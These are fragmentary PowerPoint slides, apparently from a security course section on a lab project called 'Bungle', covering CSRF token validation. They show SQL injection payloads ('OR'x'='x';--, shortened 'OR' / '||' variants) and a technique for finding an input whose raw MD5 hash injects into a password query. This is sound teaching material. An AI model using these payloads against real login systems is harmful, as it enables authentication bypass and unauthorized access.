              </a:rPr>
              <a:t>with-practical-example.html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034392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26720" y="381000"/>
            <a:ext cx="5943600" cy="43088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l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>Imagine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0"/>
              <a:t>you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0"/>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="65" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>x.</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="7363459" cy="1365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10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y = md5(x,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25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true).</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>would </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>be a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>bitstring </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>have </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a meaning in  ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>depending </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="30" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is.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429768" y="2895600"/>
            <a:ext cx="7900034" cy="3354704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93700" marR="1289685" indent="-381000">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>FROM users </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>WHERE username=‘$username’ and  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pw=‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-60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sz="2200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="3474085">
              <a:lnSpc>
                <a:spcPts val="6909"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="595"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>This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cause </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL injection!  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Finding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>y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25" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-55" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-50" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>forever.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2555"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Alternative </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>approach: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Let’s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>find </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>substring </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which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10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="50" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>effect </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>as the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>one </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>demo.</a:t>
            </a:r>
            <a:endParaRPr sz="24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03490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1986"/>
            <a:ext cx="8229600" cy="828304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="149733" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="673100" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" spc="-5" dirty="0"/>
              <a:t>Shortening </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>the injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-10" dirty="0"/>
              <a:t>string</a:t>
            </a:r>
            <a:endParaRPr sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1620773"/>
            <a:ext cx="7656830" cy="28625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dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Original: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;str1&gt;’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>OR </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘x’=‘x’; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-2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&lt;str2&gt;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70"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-30" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>make </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>this </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>shorter by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>removing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="8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spaces.</a:t>
            </a:r>
            <a:endParaRPr sz="32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765"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;str1&gt;’OR‘x’=‘x’;--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&lt;str2&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="30"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="465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3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-65" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-15" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>better?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677628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07340" y="208279"/>
            <a:ext cx="7775575" cy="8420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3195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0"/>
              <a:t>users </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>username=’$username’</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="l">
              <a:lnSpc>
                <a:spcPts val="3195"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0"/>
              <a:t>and pw=‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="548ED4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;str1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’OR‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AF50"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;str2&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00AF50"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0"/>
              <a:t>’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307340" y="1602485"/>
            <a:ext cx="8227695" cy="46183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just">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;str2&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>begins with ‘1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>through </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-80" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘9’, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>then the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="114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right</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="just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term </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>equivalent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-3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true.</a:t>
            </a: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3650" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5401310" algn="just">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pP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45" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>’or‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>?  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>about </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-55" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>’oR‘</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-85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?  ’||‘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dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>?</a:t>
            </a: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4000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="just">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-25" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Different </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>variations </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>strings result </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in speedup</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-5" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" algn="just">
              <a:lnSpc>
                <a:spcPts val="3650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-90" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-10" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="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8325497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Understanding Token Validation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Prof. Bailey has talked about token validation as a method of defense against CSRF.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bungle can also validate tokens when this setting is enabled by user on navigation bar above.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676271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7818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52400"/>
            <a:ext cx="9144000" cy="514099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-33270" y="5293390"/>
            <a:ext cx="9144000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200" dirty="0" smtClean="0"/>
              <a:t>Note: You can inspect elements by pressing F12 from Firefox.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3806383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789731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52014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505"/>
            <a:ext cx="9144000" cy="5140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11805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Understanding CSRF Defense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If Malory, an adversary between user and Bungle, wants to make a CSRF attack between user and Bungle, then Malory needs to provide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>csrf_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as one of POST request parameters. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is there anyway Malory can obtain cookie from user’s browser?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61052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Implementing Bungle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altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>In checkpoint 1 you will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Construct database to store user and search history information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Write code which processes user input to SQL queries (connecting frontend and backend)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
